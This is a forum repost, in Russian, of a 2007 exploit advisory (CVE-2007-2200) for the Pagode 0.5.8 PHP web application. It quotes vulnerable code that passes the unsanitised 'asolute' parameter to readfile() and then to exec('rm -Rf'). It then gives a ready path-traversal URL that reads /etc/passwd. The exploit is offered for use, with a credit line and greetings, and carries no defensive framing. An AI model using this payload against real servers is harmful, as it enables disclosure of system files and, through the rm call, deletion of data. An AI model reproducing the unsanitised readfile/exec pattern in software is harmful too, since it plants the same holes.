Exploit Pagode 0.5.8 - 'navigator_ok.php?asolute' Remote File Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3783
Проверка EDB
  1. Пройдено
Автор
GOLD_M
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-2200
Дата публикации
2007-04-23
Код:
# Pagode 0.5.8(navigator_ok.php asolute)Remote File Disclosure
# D.Script:http://belnet.dl.sourceforge.net/sourceforge/pagode/pagode-0.5.8.tar.gz
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# V.Code In /navigator/navigator_ok.php: 
###################/navigator/navigator_ok.php###################
#  <?
#  	session_cache_limiter('none');
#	session_start();
#	include ('../includes/functions.php');
#
#	header("Content-Type: application/save-as");
#	header("Content-Length: $file_size");
#	header("Content-Disposition: attachment; filename=$file_name");
#	header("Content-Transfer-Encoding: binary");
#	readfile($asolute); <----[+]
#	exec("rm -Rf $asolute");
#  ?>
#################################################################
# Exploit:[Path_Pagode]/navigator/navigator_ok.php?asolute=../../../../../../etc/passwd
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group & 020

# milw0rm.com [2007-04-23]
 
Источник
www.exploit-db.com

Похожие темы